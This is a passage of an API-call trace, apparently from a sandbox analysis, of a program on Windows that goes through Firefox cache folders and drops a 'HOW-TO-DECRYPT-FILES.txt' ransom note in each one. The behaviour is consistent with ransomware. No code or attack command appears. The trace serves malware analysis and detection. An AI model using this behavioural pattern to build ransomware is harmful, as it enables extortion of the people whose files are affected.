GetLastError () returned 0x12 [0049.287] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC", lpFilePart=0x0) returned 0x53 [0049.287] GetLastError () returned 0x12 [0049.288] SetErrorMode (uMode=0x1) returned 0x0 [0049.288] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.288] GetLastError () returned 0x12 [0049.288] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.288] SetErrorMode (uMode=0x0) returned 0x1 [0049.288] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC", lpFilePart=0x0) returned 0x53 [0049.288] GetLastError () returned 0x12 [0049.288] SetErrorMode (uMode=0x1) returned 0x0 [0049.288] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.288] GetLastError () returned 0x12 [0049.288] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.288] SetErrorMode (uMode=0x0) returned 0x1 [0049.289] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\CAECFd01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\CAECFd01", lpFilePart=0x0) returned 0x5c [0049.289] GetLastError () returned 0x12 [0049.289] SetErrorMode (uMode=0x1) returned 0x0 [0049.289] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\CAECFd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\4\\ec\\caecfd01"), fInfoLevelId=0x0, lpFileInformation=0x1c3cbec | out: lpFileInformation=0x1c3cbec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4d131f0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4d131f0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4d131f0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xb361)) returned 1 [0049.289] GetLastError () returned 0x12 [0049.289] SetErrorMode (uMode=0x0) returned 0x1 [0049.289] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.289] GetLastError () returned 0x12 [0049.289] SetErrorMode (uMode=0x1) returned 0x0 [0049.289] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\4\\ec\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.289] GetLastError () returned 0x0 [0049.289] GetFileType (hFile=0x184) returned 0x1 [0049.289] SetErrorMode (uMode=0x0) returned 0x1 [0049.289] GetFileType (hFile=0x184) returned 0x1 [0049.289] WriteFile (in: hFile=0x184, lpBuffer=0x1c58930*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c58930*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.290] GetLastError () returned 0x0 [0049.290] CloseHandle (hObject=0x184) returned 1 [0049.290] GetLastError () returned 0x0 [0049.290] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.291] GetLastError () returned 0x0 [0049.291] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.291] GetLastError () returned 0x0 [0049.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE", lpFilePart=0x0) returned 0x53 [0049.291] GetLastError () returned 0x0 [0049.291] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.291] GetLastError () returned 0x0 [0049.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE", lpFilePart=0x0) returned 0x53 [0049.291] GetLastError () returned 0x0 [0049.291] SetErrorMode (uMode=0x1) returned 0x0 [0049.291] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.291] GetLastError () returned 0x0 [0049.291] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.291] SetErrorMode (uMode=0x0) returned 0x1 [0049.292] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE", lpFilePart=0x0) returned 0x53 [0049.292] GetLastError () returned 0x12 [0049.292] SetErrorMode (uMode=0x1) returned 0x0 [0049.292] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.292] GetLastError () returned 0x12 [0049.292] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.292] SetErrorMode (uMode=0x0) returned 0x1 [0049.292] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\95599d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\95599d01", lpFilePart=0x0) returned 0x5c [0049.292] GetLastError () returned 0x12 [0049.292] SetErrorMode (uMode=0x1) returned 0x0 [0049.292] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\95599d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\4\\ee\\95599d01"), fInfoLevelId=0x0, lpFileInformation=0x1c5bf20 | out: lpFileInformation=0x1c5bf20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc23dd510, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc23dd510, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc23dd510, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4192)) returned 1 [0049.292] GetLastError () returned 0x12 [0049.292] SetErrorMode (uMode=0x0) returned 0x1 [0049.292] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.292] GetLastError () returned 0x12 [0049.292] SetErrorMode (uMode=0x1) returned 0x0 [0049.292] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\4\\ee\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.293] GetLastError () returned 0x0 [0049.293] GetFileType (hFile=0x184) returned 0x1 [0049.293] SetErrorMode (uMode=0x0) returned 0x1 [0049.293] GetFileType (hFile=0x184) returned 0x1 [0049.293] WriteFile (in: hFile=0x184, lpBuffer=0x1c77c64*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c77c64*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.294] GetLastError () returned 0x0 [0049.294] CloseHandle (hObject=0x184) returned 1 [0049.294] GetLastError () returned 0x0 [0049.294] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.294] GetLastError () returned 0x0 [0049.294] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EE\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.294] GetLastError () returned 0x0 [0049.294] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD", lpFilePart=0x0) returned 0x53 [0049.294] GetLastError () returned 0x0 [0049.294] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.294] GetLastError () returned 0x0 [0049.294] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD", lpFilePart=0x0) returned 0x53 [0049.294] GetLastError () returned 0x0 [0049.294] SetErrorMode (uMode=0x1) returned 0x0 [0049.294] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.294] GetLastError () returned 0x0 [0049.294] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.294] SetErrorMode (uMode=0x0) returned 0x1 [0049.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD", lpFilePart=0x0) returned 0x53 [0049.295] GetLastError () returned 0x12 [0049.295] SetErrorMode (uMode=0x1) returned 0x0 [0049.295] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.295] GetLastError () returned 0x12 [0049.295] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.295] SetErrorMode (uMode=0x0) returned 0x1 [0049.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\C0E61d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\C0E61d01", lpFilePart=0x0) returned 0x5c [0049.295] GetLastError () returned 0x12 [0049.295] SetErrorMode (uMode=0x1) returned 0x0 [0049.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\C0E61d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\4\\fd\\c0e61d01"), fInfoLevelId=0x0, lpFileInformation=0x1c7b254 | out: lpFileInformation=0x1c7b254*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4b4a170, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4b4a170, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4b4a170, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x72a6)) returned 1 [0049.295] GetLastError () returned 0x12 [0049.295] SetErrorMode (uMode=0x0) returned 0x1 [0049.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.295] GetLastError () returned 0x12 [0049.295] SetErrorMode (uMode=0x1) returned 0x0 [0049.295] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\4\\fd\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.296] GetLastError () returned 0x0 [0049.296] GetFileType (hFile=0x184) returned 0x1 [0049.296] SetErrorMode (uMode=0x0) returned 0x1 [0049.296] GetFileType (hFile=0x184) returned 0x1 [0049.296] WriteFile (in: hFile=0x184, lpBuffer=0x1c96f98*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c96f98*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.297] GetLastError () returned 0x0 [0049.297] CloseHandle (hObject=0x184) returned 1 [0049.297] GetLastError () returned 0x0 [0049.297] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.297] GetLastError () returned 0x0 [0049.297] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\FD\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.297] GetLastError () returned 0x0 [0049.297] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5", lpFilePart=0x0) returned 0x50 [0049.297] GetLastError () returned 0x0 [0049.297] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.298] GetLastError () returned 0x0 [0049.298] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5", lpFilePart=0x0) returned 0x50 [0049.298] GetLastError () returned 0x0 [0049.298] SetErrorMode (uMode=0x1) returned 0x0 [0049.298] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.298] GetLastError () returned 0x0 [0049.298] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.298] SetErrorMode (uMode=0x0) returned 0x1 [0049.298] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5", lpFilePart=0x0) returned 0x50 [0049.298] GetLastError () returned 0x12 [0049.298] SetErrorMode (uMode=0x1) returned 0x0 [0049.298] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.298] GetLastError () returned 0x12 [0049.298] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.298] SetErrorMode (uMode=0x0) returned 0x1 [0049.298] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1", lpFilePart=0x0) returned 0x53 [0049.298] GetLastError () returned 0x12 [0049.298] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.298] GetLastError () returned 0x12 [0049.298] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1", lpFilePart=0x0) returned 0x53 [0049.298] GetLastError () returned 0x12 [0049.298] SetErrorMode (uMode=0x1) returned 0x0 [0049.298] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.299] GetLastError () returned 0x12 [0049.299] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.299] SetErrorMode (uMode=0x0) returned 0x1 [0049.299] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1", lpFilePart=0x0) returned 0x53 [0049.299] GetLastError () returned 0x12 [0049.299] SetErrorMode (uMode=0x1) returned 0x0 [0049.299] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.299] GetLastError () returned 0x12 [0049.299] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.299] SetErrorMode (uMode=0x0) returned 0x1 [0049.299] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\C8C27d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\C8C27d01", lpFilePart=0x0) returned 0x5c [0049.299] GetLastError () returned 0x12 [0049.299] SetErrorMode (uMode=0x1) returned 0x0 [0049.299] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\C8C27d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\5\\f1\\c8c27d01"), fInfoLevelId=0x0, lpFileInformation=0x1c9bd90 | out: lpFileInformation=0x1c9bd90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc48505f0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc48505f0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc48505f0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x5244)) returned 1 [0049.299] GetLastError () returned 0x12 [0049.299] SetErrorMode (uMode=0x0) returned 0x1 [0049.299] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.299] GetLastError () returned 0x12 [0049.299] SetErrorMode (uMode=0x1) returned 0x0 [0049.300] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\5\\f1\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.300] GetLastError () returned 0x0 [0049.300] GetFileType (hFile=0x184) returned 0x1 [0049.300] SetErrorMode (uMode=0x0) returned 0x1 [0049.300] GetFileType (hFile=0x184) returned 0x1 [0049.300] WriteFile (in: hFile=0x184, lpBuffer=0x1cb7ce4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cb7ce4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.301] GetLastError () returned 0x0 [0049.301] CloseHandle (hObject=0x184) returned 1 [0049.301] GetLastError () returned 0x0 [0049.301] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.301] GetLastError () returned 0x0 [0049.301] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\5\\F1\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.301] GetLastError () returned 0x0 [0049.301] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6", nBufferLength=0x105, 